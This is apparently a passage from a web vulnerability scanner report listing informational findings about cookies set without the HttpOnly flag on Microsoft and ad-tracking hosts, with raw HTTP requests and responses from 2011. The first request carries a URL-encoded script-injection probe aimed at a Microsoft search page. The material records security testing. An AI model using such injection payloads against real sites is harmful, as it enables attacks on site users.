GET /dcs1syazm89k7m2op08jll1k8_9j1d/dcs.gif?&dcsdat=1309951358760&dcssip=search.microsoft.com&dcsuri=/Preference.aspx&dcsqry=%3Fbd498%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ef1d3c6b4585=1%26mkt=en-US&dcsref=http://burp/show/0&WT.tz=-5&WT.bh=6&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Microsoft%20Search%20Preferences%20Page&WT.js=Yes&WT.jv=1.5&WT.bs=1057x822&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.dcsvid=GUID=b99db294605ea749842ddaca50c2f3af%26HASH=94b2%26LV=20115%26V=3&WT.co_f=173.193.214.243-3661456592.30151123&WT.vt_f_tlh=1309950916&WT.vt_sid=173.193.214.243-3661456592.30151123.1309950893261&wtDrillDir=/&wtEvtSrc=search.microsoft.com/Preference.aspx HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://search.microsoft.com/Preference.aspx?bd498%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ef1d3c6b4585=1&mkt=en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAPAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROCAAAABMAAAALkABOjo4ATmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 11:22:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAQAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAH5FFE5+RRROCQAAABMAAAALkABOjo4ATmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAAB+RRROfkUUTgAAAAA-; path=/; expires=Sat, 03-Jul-2021 11:22:38 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

10.46. http://m.webtrends.com/dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.webtrends.com
Path:	/dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAQAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAAF9OFE5fThROGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAEVGFE5+RRROCQAAABMAAABfThROX04UTmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAABFRhROfkUUTgAAAAA-; path=/; expires=Sat, 03-Jul-2021 12:00:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif?&dcsdat=1309953631760&dcssip=www.microsoft.com&dcsuri=/library/toolbar/3.0/trademarks/&dcsref=http://burp/show/10&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=We%20are%20sorry,%20the%20page%20you%20requested%20cannot%20be%20found.&WT.js=Yes&WT.jv=1.5&WT.bs=1057x822&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.dcsvid=GUID=b99db294605ea749842ddaca50c2f3af%26HASH=94b2%26LV=20115%26V=3&WT.wtsv=1&WT.co_f=173.193.214.243-3661456592.30151123&WT.vt_f_tlh=1309953629&WT.vt_sid=173.193.214.243-3661456592.30151123.1309953629803&wtDrillDir=/library/;/library/toolbar/;/library/toolbar/3.0/;/library/toolbar/3.0/trademarks/&wtEvtSrc=www.microsoft.com/library/toolbar/3.0/trademarks/ HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/library/toolbar/3.0/trademarks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAQAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAEVGFE5+RRROCQAAABMAAAALkABOjo4ATmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAABFRhROfkUUTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 12:00:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAQAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAAF9OFE5fThROGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAEVGFE5+RRROCQAAABMAAABfThROX04UTmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAABFRhROfkUUTgAAAAA-; path=/; expires=Sat, 03-Jul-2021 12:00:31 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

10.47. http://m.webtrends.com/dcs55hahh00000c9vfc2qpg8w_5e9d/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.webtrends.com
Path:	/dcs55hahh00000c9vfc2qpg8w_5e9d/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAPAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAKhEFE5rRBROegAAAIpEFE6KRBROCAAAABMAAAALkABOjo4ATmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACoRBROa0QUTgAAAAA-; path=/; expires=Sat, 03-Jul-2021 11:19:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs55hahh00000c9vfc2qpg8w_5e9d/dcs.gif?&dcsdat=1309951083852&dcssip=zune.net&dcsuri=/en-US/default.htm&WT.tz=-5&WT.bh=6&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Zune%20software,%20Zune%20HD%20players,%20and%20the%20Social%20|%20Zune.net&WT.js=Yes&WT.jv=1.5&WT.bs=1057x822&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.sp=_en-us_&WT.cg_n=Home&WT.wtsv=1&WT.sv_sp=_en-us_&WT.co_f=173.193.214.243-3661456592.30151123&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_sid=173.193.214.243-3661456592.30151123.1309951083855&wtEvtSrc=zune.net/en-US/default.htm&wtDrillDir=/en-us/ HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://zune.net/en-US/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAANAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOBwAAABMAAAALkABOjo4ATmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 11:19:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAPAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAKhEFE5rRBROegAAAIpEFE6KRBROCAAAABMAAAALkABOjo4ATmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACoRBROa0QUTgAAAAA-; path=/; expires=Sat, 03-Jul-2021 11:19:04 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

10.48. http://m.webtrends.com/dcsqv1k1u100004v2eennc1xv_9v6o/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.webtrends.com
Path:	/dcsqv1k1u100004v2eennc1xv_9v6o/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAPAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROCAAAABMAAAALkABOjo4ATmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTgAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsqv1k1u100004v2eennc1xv_9v6o/dcs.gif?&dcsdat=1309951114747&dcssip=social.zune.net&dcsuri=/fragments/ccm/video/moviedetail/xbox.htm&dcsqry=%3Ftarget=web&dcsref=http://zune.net/en-US/&WT.tz=-5&WT.bh=6&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Video%20MovieDetail%20ZuneonXbox&WT.js=Yes&WT.jv=1.5&WT.bs=1057x822&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.cg_n=Social&WT.cg_s=Video&WT.sp=_en-us_&WT.wtsv=1&WT.sv_sp=_en-us_&WT.co_f=173.193.214.243-3661456592.30151123&WT.vt_f_tlh=1309951083&WT.vt_sid=173.193.214.243-3661456592.30151123.1309951083855&wtEvtSrc=social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842&wtDrillDir=/movies/;/movies/0/;/movies/0/34fa18ec-ecda-4609-be85-ce80d58c3842/ HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAOAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROCAAAABMAAAALkABOjo4ATmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACFRBROa0QUTgAAAAA-

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Wed, 06 Jul 2011 11:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcsqv1k1u100004v2eennc1xv_9v6o/dcs.gif?dcsredirect=112&dcstlh=0&dcstlv=0&dcsdat=1309951114747&dcssip=social.zune.net&dcsuri=/fragments/ccm/video/moviedetail/xbox.htm&dcsqry=%3Ftarget=web&dcsref=http://zune.net/en-US/&WT.tz=-5&WT.bh=6&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Video%20MovieDetail%20ZuneonXbox&WT.js=Yes&WT.jv=1.5&WT.bs=1057x822&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.cg_n=Social&WT.cg_s=Video&WT.sp=_en-us_&WT.wtsv=1&WT.sv_sp=_en-us_&WT.co_f=173.193.214.243-3661456592.30151123&WT.vt_f_tlh=1309951083&WT.vt_sid=173.193.214.243-3661456592.30151123.1309951083855&wtEvtSrc=social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842&wtDrillDir=/movies/;/movies/0/;/movies/0/34fa18ec-ecda-4609-be85-ce80d58c3842/
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAPAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROCAAAABMAAAALkABOjo4ATmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTgAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"

10.49. https://msnia.login.live.com/ppsecure/post.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://msnia.login.live.com
Path:	/ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3040ca2c-de70-4a63-9d3d-1c68eed3a3d2; domain=login.live.com;path=/;version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.50. http://p.brilig.com/contact/bct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/contact/bct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
bbid=AF3T0Zvr3k_eAKyttHO-2Y1-pj49skQ7XBb4DdQez_xwtEQ2i2wCqlfNJBcdkfO00ZvFh22PnRrg; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
tc="26:4499"; Version=1; Domain=.brilig.com; Max-Age=946080000; Expires=Fri, 28-Jun-2041 11:21:55 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.51. http://pinpoint.microsoft.com/en-US/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pinpoint.microsoft.com
Path:	/en-US/Default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GASurveyCookie=GASurveyTrackingCookie_A=en-US/Default.aspx&GASurveyTrackingCookie_B=; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/Default.aspx HTTP/1.1
Host: pinpoint.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.52. http://pix04.revsci.net/D08734/a1/0/0/0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4jOhOHMMH/CFfyFZ5hD9CU6do67BSgtgzWLK0cp566K2jLwzIRCIvylf4jXnXP+nYXfLWPrrGpnpaNZYHJ1HHqZT8VuypYmSEFZqKHipd3aEwUhBo+mqE5zXET/h0klTCO9quapUf84+RmhVKJgALVfezSf6cGLHRLqvYIQjT0kZECrrMnXA61RhpDsiQy8dcK/k7n1qfz3YC3yT7etQaMISozANh3vt+h0w5Ovdc+9BKxyVFaO/wTDXwDhV1ddBUJ76LLVvrhhAtAVLDpe1QuW+7UWcc18GifYdM1blY9oSwaISLoiEnn9Wz6vPio3OQB1vIOCu3lM3HLnhiEc3h1+e16CEwmxW8MNE50h5hbd3zFCAa09+LTEEB1RTC3QIR16NfHLy3I3DPw2HO9V+T3KCfhRH7Rg8tutSR9MbJsLBQt7wRFY4b7pt+OSRflmO4pYi0UuQzePGvo19Y8IUuUV/zOjE1mQfOKK7DopTL+CsWEWUSJe8bpmC9Rd8/nTV2P/01Z63CBvueh2hEAMypvqNGRLM9cAA7yQ66kbISCTJfF8PdqmoFwvNb2+q/Q1Fi7eDooDJAAkg894vEe0b//ngn1SENv8WVi7s/QeaYOnEa55YqmlqyDzADnokGFhzq7R8gFjRjefRSiaq5PK0sTx2Mq3hqMi8kZ3QSboUD02pD6aTSPxlx7HptL76Cb3+302TH/EMRNaSGk9pll5Z3oocznWfi1sFhdN0pzfrnt5tG6R8eyHY6EP7re6Oy374; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:09 GMT; Path=/
udm_0=MLv3NzMJZjpn3hepL5u85DdJSwns63EnKfX2nh8cWigJwgSuviYqkQXc89yvIeq9+M8WRtyXBOh9HXIAUS4g+2BN2COW4LBvc3ZVyH5QJHJ9JlA5kaOwaneDKCp6W6nRvKxjoLa+84C9EswWzlqVOZx3Pe+iT7uvOO2UmYgAIvXe2xeoUZXx7GgIX0hYmiAS1KK52oofEk69n+/2zO1WPujuU+nVEV6xlw3DA9vTuj2OXbf94Odr80dMBNmeAaMfnpuAg8XR3mEVTQemosaYLVED7cDgyGAFyV5jSqpmW2ZyPgafSd1iAX0Ez6Z45DWgSHO1alQm1K8I4b8/nwPzag42qICFBZDyl1zqzkL/iGAJt8X0iANCqb0G+3jwnnQkZ11WyWA+7hHnnytRYiyNq+ZP2WMVOznpi0bP1BZzgnwCI+neNQQ7yMtALEzl5AZBVftrS44LsIeH8Kv/qcjQYKB0ZWI88v+gaNLRVyeyrNPnFHb8SGftVF6qRffReEsI9/yM3HweOU6SwigjIT81Ff97T0Ftxpc5J7yeQTeILjgZWjaQnDihOjYx6885VNGtb7nQRPdxVQjL6M4DAu/5RO2vmeANOhYGYGMsbyuxCkriR4pziSXX67UTNKaIMwWnc06IQUPunqaV4UE8RvNq++Lpkrh9+1ZMeOMemnIrt3nFPjo6GDOGsLagycIEu3AIiM3kjZwsoHehLHdFkoPXjNOcg9G72o2vMzc1qYZRA2+zGgkfG8IziLRU0TNM++7tzhOU94r2SKPtrr68L6Eha1lGsbyV28/mjf+N7XhDL2n0eiJIpDgwzPSKaVkpFYnbK8WKz4dx4wCRADaanjv7gOcCF55UYjgRlJX/vNjHM6kWP9P8lCN6qMwfdHdJn4XNtJVdtcegph6wQ86wBERfribSPog6hU8XD8zOAV+X0NTXGvsPMlWrA6t2B+1aj5Np3h3J+RQfPxlm1xpHrTUwceZAQRgv3+6Y083L2UXZAxnZoo5jHRCe4UpAHFW3i4Ij5buFivhOoJ+61mUI6S3Y1LM84UcS84ZIfXkKhjf0ozZp1mYUEE2QGvOxbmrXFz/2IkSYgCXmXZTmPMkX+tFRct4/4yOCCgY4SMmhgrDi0+8lGx0CxL5lMNi4EbwIKTfFA+xsWwxLqbym/GHWjF2RqL1IIXGlNbS4MV+yRUV/BQsdepAb4mauU4GBCH2gNjzGFBtF5sHZtb0qbqMotK/Ad6qJ4nEFC13nkBu6QW3P4Au5oJQJP0qSM0YVXbbtq8mUBxf8ToEioahQIrPYjNOz1XIuPdNGO9pZ177Em8pstn02a04vRy4hUFFsbfkM8ricaS/vWyB09JBiM99JQdqgtkBdNXwwI4fxYPJuFsA8i8qJO3WL0xQ8OToYp4TOssG1giQRXBCOcuebW++WI8DImL69geiAN/Xu1TKkrChFhlZ2E4jTzgnA2NJHiEIMFqiD1GtNBCz1cFO9p9DSZjwdV1Vj677EGkwP5m2Z1knEBN1Jdis2oTIYhE7mwm9EWLOCmODdZtkBd9+rAdC5o3CttbVsMhClh1R4czt9np/0wuBinHRjpCo9fZp+AwfQGfIa5+Wz1yBM24afElvE+unPmmNYdrBiRTAHXc/pU4jTm/gHIt2BN7PofAeMT3yBhWsPDgjYgOtNXJBrwNcZt0bUuSJjcigK094nvOhdbcH4dYGoChnibu/Y96JzuyUL25IYblD299R/B11cNdwtI7cnEiJGWHve7Sxiv3IoWALmq30vTDzqO6qLBv3kL33URsedu+bv+n59ttgXFOLmwiPYbtIGk4I=; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:09 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.53. http://pix04.revsci.net/G10937/a4/0/0/0.302 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/G10937/a4/0/0/0.302

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4jmhOXMMH/C1v6FY5BD9CU6du67BSgvgzGDKYyViGy3JIntSYSCogy2dpq+vTNYcB2lBiDYquxbyc5KyKQd662VMvFJPv1Uq5+hEiNuMv1rrcc9IMSklF2Gl2leH2QScoPwA+qc3858Y0/EEUtJOb1lLVH7Jl7Qf05Ccm9I0A591R0ytDmk3/dhVjwiYtzytZlIJs1ik2IzzOBdpWnUkraZOkhZsuD2xFpH4bDNowwn1Mt6VN61EZkp2gq18WYyq/SwVfAgPacfnhGNoa0j2t6d0mKqWyDVTpo7MOHvpI6TY+rVFV0ctXwqwKtzHWcvOQB1vIOCq3gJbKRdOm8g5ervgtODIWCpKrzehFnf3uFwSbzJASDXKbvuyElRzC3QIB16NfHLy3I3DHw2HO9V+T/KCfhRH7Rg8tuvS6l9sIJ6bwWwyxkslqSob+BWyiSkct1E9Ls74UZqgkQVKs4e/XX/Cvi2KZJnZwugqUBC7SOgAIaDhyR5Dg8c/GsPevQXpUlriLOF4Et1lLKW9x3zc7WGaredOrZXJsBbxC1C7mN5tx6+Q1SUPA1gHY+f4H+VkKygKQ4CpXw31XbXpJItZ0B92GzzCcXVkAmiLUQSOYV1W/Xy3POJ+TzKnDfYSd8TU8zoIYLon5ZgAMALC/NMZCwDrluIvv94WuEX/TlfGa5341PraigX3lIAkpAbjmPB9q8wtyPoXTFON4tmbY3kWHTnleZLQfDfv64aXjU4vTZ/h45ksmfnshZDire56+37j; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.54. http://pix04.revsci.net/K08784/b3/0/3/1008211/203785884.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/K08784/b3/0/3/1008211/203785884.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

